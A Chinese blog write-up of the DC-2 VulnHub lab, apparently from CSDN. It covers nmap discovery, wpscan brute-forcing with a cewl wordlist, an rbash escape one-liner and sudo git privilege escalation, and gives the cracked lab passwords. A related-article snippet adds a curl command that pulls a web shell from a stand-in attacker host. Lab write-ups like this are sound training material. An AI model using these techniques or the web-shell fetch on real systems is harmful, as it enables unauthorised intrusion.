【DC-2靶场渗透】

最新推荐文章于 2024-07-15 15:59:36 发布
最新推荐文章于 2024-07-15 15:59:36 发布
阅读量1.2k 收藏 1
点赞数
分类专栏: 靶场渗透 文章标签: php 服务器 网络 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61872115/article/details/125697434
版权

文章目录

前言

将DC2靶场搭建在本地,如何去获取它的flag并拿到root权限呢?

一、主机发现

搭建在本地需要去扫描局域网中的主机发现DC2的ip地址
命令可使用 nmap -sP x.x.x.x/24,ping包发现

再查看它开放的服务与端口

开启了http和tcp,尝试访问

访问不到,根据上面的提示,也是说不能重定向到它,那就需要改配置文件
windows主机上改C:\Windows\System32\drivers\etc\hosts文件
liunx更改/etc/hosts
增加 10.40.2.116 dc-2这样一条命令
再访问
就可以了
看看其他信息

我们看到CMS是wordpress,数据库是MYSQL,wordpress是一种使用PHP语言和MySQL数据库开发的博客平台
三大PHP CMS网站:Drupal、 Wordpress、Joomla

使用dirb扫描一下看看有没有什么隐藏文件

看到这样一个文件,尝试访问

是一个登录界面,但是不知道用户名密码,后面可能会用到

二、开始渗透

1.flag2


大致意思:告诉我们可能会需要cewl工具和切换用户
使用cewl生成密码

使用wpscan扫出用户

三个用户admin,jerry,tom,写入到user.txt用于爆破

爆破结果

用户名:jerry 密码:adipiscing
用户名:tom 密码:parturient
于是登录网站后台
我们使用Jerry找到了flag2,但是tom用户登录不行


告诉我们不能利用worldpress,但是我们还有ssh

2.flag3

jerry不能登录,所以用tom

查看文件发现了flag3.txt,但是不能查看

我们发现使用cat命令的时候提示,tom用户使用的-rbash(权限限制的shell),因此需要换一个更大的权限。
查看可以执行的命令有vi

vi查看flag3.txt

3.flag4

绕过rbash
我们获取到的shell为:Restricted shell(受限制的shell),可以添加环境变量来绕过
BASH_CMDS[a]=/bin/sh;a
$ export PATH=$PATH:/bin/
$ export PATH=$PATH:/usr/bin/


切换用户

4.flag5

提权,试试sudo提权

看到可以git提权
搜索git提权命令,https://gtfobins.github.io/#

随便试一试

提权成功

看到最后的flag

总结

通过DC靶场的渗透让我们熟悉渗透流程

一纸-荒芜
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
靶机渗透——DC-2
Lorezon的博客
04-14 273
扫描靶机IP nmap一波
DC系列漏洞靶场-渗透测试学习复现(DC-2)
W983079520的博客
11-03 1795
DC-2是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 本篇文档中用到了vi提权和git提权。 1 环境搭建 下载靶场文件,使用Vbox或者VM打开即可;攻击机使用kali-2020。 2 主机发现 使用Kali中的arp-scan工具扫描结果如下: 172.16.12.145为DC-2靶机的IP地址。 3 端口探测 探测使用nmap工具 端口扫描结果如下: 由扫描结果知开放端口有两个: 80(http默认端口)和运行着SSH服务的7744端口。
DC-2靶机的渗透学习
里丘~班诺的小屋
09-01 1418
目录 0X00 靶机的环境搭配 0X01战前准备 一、IP扫描 二、端口扫描 三、网站目录扫描 四、查看网站结构 三、渗透开始 一、flag1 二、flag2 2.1 使用cewl生成密码 2.2 使用wpscan扫出用户 2.3 到3个用户admin、jerry、tom,并将他们放入一个文本文件中 2.4 开始爆破 2.5登录后台网页 三、flag3 3.1 ssh登录 3.2 初步查文件 四、flag4 4.1 绕过rbash 五、flag5 5.1..
Vulnhub dc-2靶机 详解 易懂
Lee_yc的博客
08-21 512
​ 下载地址:DC: 2 ~ VulnHub 下载完成后直接使用虚拟机打开就可以了,注意把靶机设置为NAT模式
DC系列】DC-2靶场
qq_51611948的博客
02-14 1147
详细介绍DC2靶机渗透全过程
DC-1靶机的渗透学习
里丘~班诺的小屋
08-31 2170
一、靶机的环境搭配 攻击机(KALI):192.168.226.129 靶机(DC-1): 192.168.226.131(未知) 靶机地址:https://www.vulnhub.com/entry/dc-1,292/ 二、战前准备 要求:攻击机和靶机在同一网段下,使用NAT模式 1、到kali的IP地址,用nmap扫描同一网段到靶机的IP 一般扫描出来的在中间而129是kali的,所以可以确定的是靶机的地址是192.168...
Vulnhub系列之DC2靶场详解
weixin_50053818的博客
05-05 1736
TOC {:toc} 环境 DC-1靶场 VMware虚拟机 kali 直接更改域名解析进网站拿flag1 根据目标靶场的MAC地址得出IP为:192.168.31.182,直接上nmap扫描。 可以发现开放了80端口,网页服务器但是可以看出做了域名解析,所以需要在本地即kali的配置文件/etc/hosts文件写入192.168.31.182 dc-2即可完成本地域名解析。还可以看出网站是由WordPress内容管理系统搭建的。 还开放了7744端口,可以知道使用协议是ssh,所以可以远程连接。 .
DC-2靶场
m0_74413354的博客
03-14 617
Vulhub下DC系列靶场DC2靶场通关
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
vuInhub靶场实战系列-DC-6实战
05-29
vuInhub靶场实战系列-DC-6实战
vuInhub靶场实战系列-DC-9实战
06-02
vuInhub靶场实战系列-DC-9实战
vulnhub-dc2靶场
longwanlian的博客
01-19 1995
1、hosts文件指定ip对应域名2、工具使用:cewl(收集网站字典)、dirb(目录探测)、wpscan(针对wordpress制作的扫描工具)3、linux命令compgen -c #查看当前可用命令find / -perm -u=s -type f 2>/dev/null #查存在sudo权限的命令sudo -l #查看当前用户可使用的sudo权限6)][外链图片转存中…(img-UnDKf5oc-1705657141846)]至此结束1、hosts文件指定ip对应域名。
DC2靶场 wordpress
m0_62438849的博客
03-03 1054
试着登录网站,但是没有看到登录框,所以要扫描一下整个网站目录,可以用dirb http://dc-2或者dirsearch -u(指定url)http://dc-2。然后就能访问网站了,看到flag1,常用的字典攻击可能会不奏效,需要用 字典生成工具cewl,密码总是越多越好,但无法获得所有密码,登录后可以看到下一个flag。可以知道登录入口是,http://dc-2/wp-admin/(wordpress的登录入口就是/wp-admin/)Cewl是一个 ruby 应用,爬行指定url的指定深度。
DC2靶场通关详细记录】
博客
12-15 1064
DC2靶场通关----使用cewl工具抓取网站内容生成密码字典cewl 网址 -w pass.txt使用wpscan枚举用户和爆破用户的登陆密码wpscan --url 网址 -e u和wpscan --url 网址 -U 用户名字典 -P 密码字典rbash绕过的方法:使用vi绕过rbashvi进入vi后:shellsudo提权方法!/bin/bash。
DC-2 靶场渗透
lin__ying的博客
03-20 845
环境:kali ip:192.168.157.128靶机:dc-2 ip:192.168.157.129确保kali和靶机在NAT模式下。
DC-2靶场记录
lionwerson的博客
11-17 981
1.下载DC-2靶场: 下载地址https://download.vulnhub.com/dc/DC-2.zip2.虚拟机打开靶场改网卡模式为桥接模式,打开虚拟机。 如果要是直接访问靶机的IP的80端口是打不开的,会跳转到http://dc-2/,要修改hosts文件,然后就可以访问到了。 在hosts文件结尾添加: ip地址 dc-2 这是一个wordpress的cms,第一个flag提示我们进行登录并且用cewl生成密码列表。 cewl -w dc.txt http://d.
ns3-gym入门(二):linear-mesh例子详解
最新发布
zoe2222226666的博客
07-15 893
学习ns3-gym中关于IEEE 802.11网状网络中控制随机接入的例子linear-mesh
DC-5靶场渗透过程中,怎样挂载木马文件
06-02
DC-5 靶场渗透过程中,如果要挂载木马文件,可以按照以下步骤进行操作: 1. 到可写入的目录:可以使用 `ls -al` 命令查看目录权限,到可写入的目录。通常会有一些临时目录或者上传目录是可写入的。 2. 上传木马文件:将自己准备好的木马文件上传到可写入的目录中。可以使用 `curl` 或者 `wget` 命令进行上传,例如: ``` curl -o shell.php http://attacker.com/shell.php ``` 上述命令会将 `shell.php` 文件下载到本地,并保存到当前目录下。 3. 运行木马文件:在浏览器中访问上传的木马文件,例如 `http://dc5/wordpress/wp-content/plugins/akismet/views/akismet.php`。如果一切正常,就可以获得一个远程 shell,并在目标系统中执行任意命令了。 需要注意的是,这种做法是违法的,仅用于学习和研究目的,切勿在未授权的情况下对他人的系统进行攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

一纸-荒芜

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值